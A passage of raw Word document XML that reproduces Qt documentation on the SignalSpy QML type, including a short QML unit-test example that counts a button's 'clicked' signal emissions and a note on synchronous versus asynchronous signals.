          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1964" w:history="1">
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qttest</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signalspy</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="003D69BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="001E089F" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="00111EA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1595" w:name="_Toc483000876"/>
      <w:bookmarkStart w:id="1596" w:name="_Toc483003869"/>
      <w:bookmarkStart w:id="1597" w:name="_Toc483604221"/>
      <w:bookmarkStart w:id="1598" w:name="_Toc483605441"/>
      <w:r w:rsidRPr="00111EA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SignalSpy QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1595"/>
      <w:bookmarkEnd w:id="1596"/>
      <w:bookmarkEnd w:id="1597"/>
      <w:bookmarkEnd w:id="1598"/>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00A652BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>introspection of signal emission</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="001E089F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00A652BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1965" w:history="1">
        <w:r w:rsidRPr="001E089F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SignalSpy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is installed to watch the "clicked" signal on a user-defined Button type. When the signal is emitted, the</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1966" w:anchor="count-prop" w:history="1">
        <w:r w:rsidRPr="001E089F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>count</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property on the spy will be increased.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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id</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 xml:space="preserve"> button</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w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SignalSpy</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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id</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 xml:space="preserve"> spy</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target</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 xml:space="preserve"> button</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signalName</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"clicked"</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w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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name</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ButtonClick"</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w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_click</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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compare</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spy</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count</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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button</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clicked</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</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compare</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spy</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count</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="001E089F">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E089F">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="001E089F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E089F" w:rsidRPr="001E089F" w:rsidRDefault="001E089F" w:rsidP="001E089F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A652BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>above style of test is suitable for signals that are emitted synchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For asynchronous signals, the</w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1967" w:anchor="wait-method" w:history="1">
        <w:r w:rsidRPr="00A652BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wait</w:t>
        </w:r>
        <w:r w:rsidRPr="001E089F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
